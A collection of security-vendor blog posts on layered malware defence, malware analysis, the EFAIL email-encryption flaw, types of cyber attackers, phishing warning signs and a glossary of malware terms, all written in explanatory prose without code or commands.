With multiple levels of protection to be on the safe side

With multiple levels of protection to be on the safe side

Anti-virus solutions alone are not enough – but they still make sense

The world has become more complex, not only in politics and business but also in the field of IT security. Multi-layered defense measures are a must for companies if they want to effectively protect their IT infrastructure because cyber threats have also become much more versatile and professional. “Simple” solutions by themselves are no longer enough, yet still have their reason for being.

Until a few years ago it was relatively easy to organize the protection of your IT systems. And even today, there are still companies that rely on a few established defensive measures. Together with a firewall and a spam filter, classic AV solutions are still the standard to protect against intruders, and one of the main reasons this type of protection is generally accepted as a proven mechanism against malware. Antivirus products are highly automated and do not require extensive attention from IT administrators or security specialists, which saves money, time and effort.

Modern malware outwits classic AV products

Hornetsecurity News


Stay in touch

Sign up to get the latest News about Cloud Security.

On the other hand, the discussion has been smoldering for some time as to whether anti-virus solutions are still effective against malware at all or perhaps do more harm than good and should therefore be abandoned. The fact is, classic products for defending against malware no longer offer adequate protection. Classic AV scanners fail to recognize all malware specimens and many specimens are not recognized at all, even after many weeks or even months.

Strengths and weaknesses in malware detection are widely distributed among the various AV providers. In addition, new types of cyber-attacks are making life increasingly difficult for classic AV scanners. Polymorphic viruses, e.g. in the form of ransomware, are evading signature-based detection mechanisms in slightly modified forms. Classic AV scanners have little or no chance against file-less attacks such as CEO fraud as these do not contain any suspicious objects for investigation.

Equally problematic are links in documents that can lead to downloads of malware. Companies that solely rely on the use of classic security solutions weigh themselves in false security. Nevertheless, the use of classic AV scanners is necessary and sensible.

Many defensive measures spoil the attacker’s success

Modern IT security solutions and suites are built on the principle of multiple protection with multiple defense methods and there are good reasons for employing multi-level protection. If the first protective measures complete part of the task in a relatively simple way, the powerful and more complex filters behind it are no longer so heavily loaded and thus perform better.

Subsequent security levels based on heuristic or behavior-based filter systems significantly improve detection performance and thus increase the chance of being spared damage by malware. These include services that detect hidden links in emails or attachments, analyze the behavior of malware in a sandbox, or hold back suspicious email attachments for a certain period of time and then check these attachments again with updated signatures.

Many companies have recognized this and rely on a multi-part defense strategy with several defensive lines in place. This way, they minimize the risk of experiencing a nasty surprise and becoming victims of a cyber-attack.

Additional information:

  1. Hornetsecurity Managed Spamfilter Service for companies
  2. Want to learn more about Advanced Threat Protection? Find out more now!.
  3. Do you already know the Hornetsecurity Knowledge Base? Click here for more information.
Malware Analysis and Defense

Malware Analysis and Defense

Third part of the multipart “Defense against malware”

The workstations of our malware analysts do not differ from others in Hornetsecurity’s offices, even though the Security Lab is referred to as a “laboratory”. Erlenmeyer flasks, test tubes and Bunsen burners are not to be found, but quite normal computers. The work is done virtually, in sandboxes or by analyzing the data traffic. Nevertheless, the importance of malware analysts should not be underestimated, as it ensures that Hornetsecurity’s defense systems are always as up-to-date as possible and maintain the highest quality standard.

But what is the procedure for analyzing malware? Usually there is a very large, continuous stream of data to analyze. The main task is to extract valuable information from the raw data, process it and make it “intelligent”. To this end, analysts use various tools and programs to answer specific questions: What are the objectives of malware? Which characteristics are typical for the investigated malware? Is there any evidence of the attacker(s)? Ideally, actions can be derived from the findings such as writing new filter rules or creating algorithms.

Two different types of analysis

Two ways of analyzing malware are presented in more detail here. In static analysis, the code itself is viewed without executing the malware, while in dynamic analysis, the behavior of the malicious code is tracked in a secure environment.

In the static analysis, the analysts break down the malware to the smallest detail in order to draw conclusions from the code itself. For example, significant strings are extracted or shell scripts are started and further results are generated with disassemblers. Here you can find information on the activities of the malware and which features it shows, the so-called Indicators of Compromise (IoC). Based on the findings, the individual filter systems can be updated to prevent further attacks by this and similar malware as quickly as possible.

One possibility for dynamic analysis is to let the malicious code perform its task in the secure environment of a sandbox. This method can be well automated to obtain certain results. The filter systems can be updated based on these results. Does the code change certain files, does it make changes in the registry or has it generally adapted the system settings to DNS servers, for example? Who does the malware contact? These and other questions can be answered in the following way.

Hornetsecurity News


Stay in touch

Sign up to get the latest News about Cloud Security.

Various possibilities of use

The most obvious application of the data obtained from malware analysis for IT security companies is to improve their defense methods and thus better protect their customers from attacks. To do this, analysts extract certain binary patterns and use them to create so-called Yara rules with which malware samples can be found, categorized and grouped. Behavior signatures applied in the sandbox can detect and categorize certain behavior patterns of malicious code.

An example: In the sandbox, an Office document in the file attachment is opened. There the behavioral signatures recognize that the document to be examined begins to collect and send information about user accounts. If this analysis takes place in a cloud-based environment, it is then possible to intercept the conspicuous emails and thus completely block the attacks.

All of these and many other defense measures should help to intercept and prevent an attack at the earliest possible point so that the damage caused by malware is as small as possible or, better yet, does not occur at all.

Much of the raw data obtained by malware analysis and the findings derived from it are also useful for general prevention. Research projects can benefit from this and make their scientifically-sound results available to the general public. In addition, the publication of malware analyses also serves to educate the public. Increasing knowledge about the approaches of cyber attacks and malware attacks helps to limit their success rates.

EFAIL: A vulnerability in the PGP and S/MIME encryption methods?

EFAIL: A vulnerability in the PGP and S/MIME encryption methods?

UPDATE from May 16, 2018:

In order to proactively protect our corporate customers, who are still encrypting and decrypting their emails via an in-house solution and have not yet booked the Hornetsecurity Encryption Service, from EFAIL, we have also developed a special filter level for attacks according to the EFAIL pattern. The only prerequisite for this is that their email communication runs via the Hornetsecurity servers, which is generally the case with our email security products.

 

The filter level is already activated by default for all our customers who have booked at least the Hornetsecurity spam filter service and. It protects not only against EFAIL, but also against future attacks with similar patterns.

 

+++++

 

A known vulnerability is transferred to the PGP and S/MIME protocols and takes email manipulation to a new level. No problem for Hornetsecurity.

On Monday, May 14, 2018, a team of security researchers from the University of Applied Sciences Münster, the Ruhr University Bochum and the University of Leuven (Belgium) published a paper that questions the security of the PGP and S/MIME encryption standards and thus attracts worldwide attention.

However, the vulnerabilities discovered (CVE-2017-17688 and CVE-2017-17689) do not affect the protocols themselves, but use an already known vulnerability to decrypt encrypted emails by the mail client and send them to the attacker.

A prerequisite for the execution of the attacks is that the attacker already possesses emails in encrypted form. To do this, the emails need to be intercepted during transport. The attacker must have previously executed a man-in-the-middle attack (MitM) or compromised a mail server to gain access to the emails passing through him or the server. Only if these requirements are met, the attacker can execute one of the EFAIL attacks described in the paper.

The authors of the paper present two similar attacking methods to decrypt emails with existing PGP or S/MIME encryption.

The first method is quite simple, but limited to certain email clients (Apple Mail, iOS Mail, Mozilla Thunderbird) and any third-party plug-ins installed there:

To do this, the attacker creates an email with three body parts. The first part formats the email as HTML and inserts an image tag with a target website. The quotation marks and the image tag are not closed. This is followed in the second body part by the PGP- or S/MIME-encrypted text. The third part consists of HTML formatting again and closes the image tag from part one.

EFAIL vulnerabilty pgp smime encryption methods

(Source: EFAIL attacks, 14/05/04 )

If the attacker sends this email to the sender of the encrypted message, it is possible that the message is decrypted and transmitted to the stored website. To do this, the email client must be configured so that it automatically downloads external images without asking the user.

The second way to read PGP or S/MIME encrypted emails is a well-known method of how to extract plain text in blocks of encrypted messages.

The attacking scenarios are called CBC attack (S/MIME) and CFB attack (PGP). They determine a known text portion in an encrypted message and overwrites subsequent blocks with their own content. The EFAIL attack inserts an image tag with a target website into the encrypted text, as described in the first part. If the message is then delivered to the actual recipient of the encrypted message, it is possible that the message is decrypted and transmitted to the attacker.

Hornetsecurity News


Stay in touch

Sign up to get the latest News about Cloud Security.

The emails encrypted by Hornetsecurity are protected by design against attacks of this kind, since Hornetsecurity does not even allow the different content types (multipart/mixed) required for the attack.

The encryption methods themselves – S/MIME and PGP – were not broken; rather, vulnerabilities were found in email clients for HTML emails that bypass these encryption techniques. In addition, we object to the recommendation of various security researchers to generally deactivate content encryption: PGP and S/MIME are still not per se more insecure than a pure transport-encrypted transmission or no encryption at all, even after this publication. Since the attack requires a MitM attack, i.e. a breaking of the possible transport encryption, a general levering out of content encryption would be fatal: Possible attackers could even read the email traffic directly like a postcard!

Hornetsecurity Encryption Service, which is immune to EFAIL, does not require any client plug-ins: Encryption and decryption are fully automated by Hornetsecurity in the cloud – no installation, maintenance or user interaction is required – simply secure!

Further information:

The who’s who of cybercriminals

The who’s who of cybercriminals

In the first part of our little blog series on the basics of malware, we’ve been dealing with the terminology of viruses, worms, etc. We discovered that the types of cyberattacks have changed considerably over the years. Until a few years ago, relatively simple spam messages and viruses were widely distributed according to the minimax principle (minimum effort at maximum range). Today, attacks are more sophisticated and unique. This is because defense mechanisms have adapted and the detection of waves of mass spam and viruses has been significantly improved. But before this multi-part series explores how malware can be analyzed and fended off, let’s shed light on who’s behind all these attacks.

The stereotype of a hacker looks something like this: A pale, hoodie-wearing, single man sits in a dark basement while eating pizza and drinking cola. From here, he is hacking code into a computer and attacks his targets. The reality of it is much more complex. Nowadays, cyber-attackers are acting like small businesses – they consist of teams whose members specialize in subtasks and who professionally distribute their “goods”. After all, this industry has become a highly lucrative field of activity and cybercrime revenues are said to be even higher than in worldwide drug trafficking.

More than just nerds sitting in basements

To security professionals’ dismay, there are a large number of varying cybercrime groups. To complete the list thematically, we therefore also have to include the field of cyberwar. The goals of this group of people are often not monetary, but ideological.

The following list shows some groups that most cybercriminals can be divided into:

Professional criminals

This group includes all those who pursue purely economic goals with their cyber-attacks. Their aim is to generate the highest possible amount of money – in whatever form. In addition to banking trojans and spyware, they also use ransomware attacks or crypto mining malware. The sale of stolen data and information should also be mentioned: Selling lists of emails or other personal information, botnets and other content can be highly profitable. Even the sale of malware itself falls into this category: attacks are offered as a service, so that even technically less experienced or less-equipped people can launch attacks. This could be in form of a new ransomware, but also in form of a simple DDoS attack on companies, organizations and government agencies.

 

Hornetsecurity News


Stay in touch

Sign up to get the latest News about Cloud Security.

State actors

These are actors that can be attributed to national governments. One of their main goals is to improve the situation for their own country, be it through hacker attacks or through sabotage, classic espionage or the infiltration of opponents.

Although these activities are not openly communicated by individual countries, they are still an open secret. As a result, individual countries repeatedly blame each other for these attacks – currently the American FBI and the British National Cyber Security Center (NCSC) accuse Russia of being responsible for a large-scale cyberattack in which hackers have infiltrated network infrastructures on a large scale. By the way, the two authorities are using the cyber kill chain as an explanation.

To combat crime and terrorism, authorities are actively using certain programs to spy on target persons and obtain information relevant to investigations. The Federal Trojan, which is allegedly already in use, is such an example. Officially, the state organs are subject to the legislative and judiciary, but in reality, this control has gaps.

Some state institutions even gather their own knowledge about security holes without allowing them to be closed so that they may be able to exploit them for themselves. The problem is that if these so-called zero-day exploits fall into the wrong hands they can then be misused – as it happened in the ransomware attack WannaCry, in which an exploit that was probably lost by the NSA, was used by North Korean hacker groups.

Activists, political groups

This group of cyber criminals, also known as “hacktivists”, conducts cyberattacks based on their ideological views. Victims can include private companies, politicians or state organs. They try to enforce their political, social or other ideas through their attacks. In addition to classic hacking, DDoS attacks are used as well.

Hacktivists include the groups Anonymous, WikiLeaks and LulzSec.

Private companies

The private sector is not immune to the activities of cybercrime. Generalized as industrial espionage, the goal of this group of attackers is to spy on their competitors, gain information, and use it for their own benefit.

Vandal / “jesters”

These attackers do not set strategic goals for their cyber-attacks – they are more concerned with satisfying their curiosity, trying out new ideas, and gaining recognition for their achievements. It might also be the pure pleasure of destruction that drives this group of people.

Security researchers

There are also people who are actively looking for vulnerabilities in IT infrastructures to increase the security of IT systems. These experts can be found in public institutions such as universities and public authorities, but also in private companies in so-called “security labs”. The difficulty sometimes lies in cybercriminals being able to misuse and exploit these published findings for their own purposes.

Money is the main driver

The main motivation behind the attacks is highly interesting: According to a recent survey by telecommunications provider Verizon, 76% of all security breaches last year were financial in nature, followed by espionage activities, “fun motives” and personal aversions. Another very interesting statistic from the Verizon study: 28% of all data breaches were carried out by internal staff.

The next part of our series will explore how malware analysis works and how to develop defense strategies based on these findings.

Further information:

“For your safety” – Beware of fake ING-DiBa emails

“For your safety” – Beware of fake ING-DiBa emails

Cybercriminals are currently trying to obtain sensitive data from ING-DiBa customers with dubious fake emails. The fake email claims that a problem has occurred during a routine security check of the online banking system. It advises that customers should immediately log on to an external website to avoid troubles with their bank.

However, in reality, this is a phishing attack that tries to collect personal information. In the following blog article, you will learn in detail how to protect yourself from fake emails or phishing attacks.

The fake email from our example

Fake E-Mail

A German ING-DIBA fake email (click for zoom)

The adjacent picture shows the detailed structure of the fake email – allegedly sent by ING-DiBa – in an iPhone mailbox. In fact, the email is part of a mass phishing attack and the message was sent fraudulently to a variety of email recipients.

For example, the subject line states “For Your Safety (Reference Number: xyz)”, and the presumable arbitrary order of the combination was set to “kx5qrvnzx3h” in this case. Before we blackened the personal information for reasons of data protection, we noticed that both the recipient’s address and the sender’s address had the same information. This was already a first indication of a fake email.

This scam is not uncommon amongst perpetrators when it comes to gathering information about their randomly selected victims via phishing. Those affected are especially inclined to follow the attached link if the phishing or fake email is opened on a mobile device, as it is in this case. This is particularly true if they are actual customers of the bank mentioned in the email.

In everyday life, too, recipients of phishing emails are also quick to follow the link when receiving such an email. The attacker offers the targeted person appropriate options in case a recipient does not have an account with ING-DiBa. In our example, the recipient has the opportunity to follow a flashy red button and allegedly communicate that he is not a customer of ING-DiBa. The destination of the link, however, is a phishing website, which is intended to tap user data in a big way from the mostly unsuspecting victims. The fake security notification of ING-DiBa is not an isolated case.

6 tips to detect phishing or fake emails

With the following tips, you will be able to detect phishing or fake emails to protect yourself from being affected by such attacks.

Feature No. 1: The salutation

It is striking that either a standard phrase is used to address the target person, or the salutation is completely missing. Very rarely recipients of phishing emails are addressed with their whole name. This is due to the fact that fake emails are not isolated cases, but often automated emails which are sent out millions of times. Individual addresses are rather the exception. In our example there was no address at all.

Once the victim has entered his details into the according form fields and pressed the confirmation button, the cybercriminal is in possession of the login details. Now he can make orders in online shops under false names or get access to sensitive account or company data. The phishing attack has been successful.

Hornetsecurity News


Stay in touch

Sign up to get the latest News about Cloud Security.

Feature No. 2: Content of the email

A phishing mail is contextually designed to hide the true intentions towards the recipient at least until he first clicks on one of the attached links. These following baits are very popular with cyber crooks:

  • Fake emails in the form of alleged PayPal security notifications
  • Phishing emails which seem to come from banks or other institutions
  • Fake email notifications that seem to come from Amazon or Ebay
  • Fake security issues in social media accounts that need to be resolved promptly

This shows that cybercriminals are very creative when it comes to fooling their victims.

Feature No. 3: The call to action

Once the attacker has created and sent out his fake email, he urges the recipient to act. In this specific case, the targeted person is initially led to an external page by clicking on a link. This page usually resembles closely the login area of a bank, an online retailer or any other company that offers certain Internet services.

Feature No. 4: The time shortage

An effective means often used by attackers is the limitation of time. This is an attempt to put the victim under stress and distract it. In our example, this is stated as follows: “Please log into your account as soon as possible to avoid any delay in your banking activities.”

Fear-spreading phrases in the subject line, such as “Your account has been suspended” or “An amount has been debited from your account” are also quite popular and common. These sentences cause some recipients to panic, so they follow the attached link without much thought.

Feature No. 5: Questionable buttons and links

In order to successfully carry out the process of phishing, a related link in text or button form is part of the standard repertoire of any phishing or fake email. This is also the case in our example.

Therefore, when it comes to questionable security queries that have a link, we recommend that you do not access these links from your email program. Instead, you should always directly log in to your user accounts via a browser or via the official website of the provider. This applies to online services of any kind.

Feature No. 6: This is how reputable companies and institutes work

As far as the detection of phishing emails or fake emails is concerned, it should always be remembered that reputable companies or institutes would never ask you to disclose personal information via email.

For this reason, various banks regularly point to the problem of fake emails or the so-called phishing mails. One bank states for example:

“Volksbank Raiffeisenbank or BVR will never ask bank customers for personal information such as PIN or account number via email. Neither will we insert a link to online banking in emails or ask bank customers to make test or remittance transfers. These practices are always indicators of attempted fraud.” (Source: Volksbank Raiffeisenbank)

Therefore, you can delete such an email immediately. This is ultimately the simplest way to counter a phishing attack.

Additional service information

Viruses, worms, trojans – aren’t they all the same?

Viruses, worms, trojans – aren’t they all the same?

Malware, cyber-attacks and how to protect yourself and your company – are top of mind for both employees and IT managers. To help understand and tackle the issues of malware and cyber-attacks, we would like to provide a series of basic information on this topic in a loose succession. In this first post we give a definition and classification of malware, this is by no means complete, but covers some of the most important types of malware.

Viruses have been around for millions of years. but have only been known to humanity for a blink of an eye since there was no scientific evidence of viruses until the end of the 19th century. Viruses are responsible for a variety of diseases and in nature there is an eternal struggle between the evolution of viruses and the defense against them.

It is almost the same situation in the field of Information Technology. There are numerous types of malicious software and  IT security companies are constantly developing new defense methods to prevent intrusions and negative impacts on IT systems and sensitive data. When conceptually naming these malicious codes, the term “virus” is usually used.

This is perfectly understandable from the historical point of view, as originally only viruses and worms emerged as a threat. However, this terminology is insufficient because of the great variety of threats. Therefore, we would like to shed some light on the subject and give an overview of which terminologies are actually correct and which malicious codes are the most common.

Virus

The term “virus” is often used incorrectly because it is usually symbolic of the more general term “malware”. However, this is not correct since malware includes all malicious software.

The word “virus” refers only to the specific distribution path of a particular type of malware. This malware infects a defined file type and injects its part of the malicious code into it. The infected file then carries the virus on by recognizing other files of the same type and infecting them again.

However, viruses do not spread actively from computer to computer. This rather happens through external storage media, emails or within networks.

Worm

Just like the “virus”, the term “worm” stands for a certain type of distribution. Unlike the computer virus, the malicious code spreads actively and independently by exploiting existing security gaps. A current example is a worm that spreads via open Android debugging ports, especially in the area of Internet of Things (IoT), or Internet-enabled devices.

In contrast to a ransomware, or software that is clearly aiming at encrypting computer data and demanding a ransom, a computer worm does not have a clearly defined goal. For example, it can compromise and make changes to the system itself, ensure a very high utilization of the Internet infrastructure or trigger DDoS attacks.

Hornetsecurity News


Stay in touch

Sign up to get the latest News about Cloud Security.

Trojans / Trojan horses

Much of the malware that is used today can be described as “trojan horses.” The term is quite generic stating that the malware disguises itself as benign. This means that the user only sees the positive side of the application without recognizing that it has a negative impact and intention. Therefore, the user cannot influence the effects of the application.

The name “trojan horse” goes back to the legendary strategy of Greek mythology, in which the Greek invaders tricked the inhabitants of Troy with the help of a wooden horse. For this reason, the common terminology “trojan” is incorrect, since the Trojans were the inhabitants of the city and the ones that were attacked in this historic example. The horse, in fact, was the attacker.

In addition to these most commonly used malware terminologies, there is still a large number of malware that can be broken down into the following categories.

RAT: Remote Access Trojans

This type of malware allows attackers to take over computers and remotely control them. They allow attackers to execute commands on the victims’ systems and distribute the RAT to other computers with the goal of building a botnet.

Backdoor

A backdoor malware has a similar objective as a RAT but uses a different approach. The attackers use so-called “backdoors” which are mostly deliberately placed in programs or operating systems. However, they may also be installed in secret.

A special characteristic of backdoors is the fact that they can be used to bypass the existing defense mechanisms. For example, they are very attractive for cybercriminals to create botnets.

Botnets and Zombies

Botnets are large accumulations of infected computers that the attacker builds up over time. Each affected computer is called a zombie. The attacker can send commands to all computers at the same time to trigger activities such as DDoS attacks or to mine bitcoins with the help of individual zombie computers.

It is especially treacherous that owners of the affected computers do not notice that they are part of a botnet until they are already carrying out the externally controlled activities.

Spyware

This is malware that collects information from the victim’s computer. These can be Credential Stealers which extract the login data from user accounts such as email mailboxes, Amazon or Google accounts., On the other hand Keyloggers record everything that users speak or write and often take screenshots. Bitcoin Stealers search for Bitoin Wallets and rob the cryptocurrency.

Downloader / Dropper

Downloaders or droppers are small programs that serve only one purpose – to reload more malware from the Internet. At first victims are not able to recognize which contents are being downloaded because only an URL is visible. The great advantage for an attacker with this method is being able to constantly provide new malware for download and distribute up-to-date and difficult-to-detect malware.

Rootkit

Rootkits are the most dangerous type of malware, even though is not even necessarily malware. Rather, a rootkit hides malicious code from discovery. In this form of attack, the attacker penetrates deeply into the computer system, gains root privileges and thus gains general access rights. The cybercriminals then change the system so that the user no longer recognizes when processes and activities are started. It’s very hard to locate attacks based on rootkit obfuscation.

Naturally, there are other categories and definitions of malware that are not listed here. It should be noted that the malware which is circulating nowadays is mostly a mixture of several types. For example, there are trojan horses that also include a backdoor.

Often, the different attack types can be put together dynamically according to a modular principle. Therefore, the malware found today can no longer be clearly assigned to one of the categories mentioned above.

In our next post, you will learn about the main players in terms of malware and cyber-attacks.

Further information: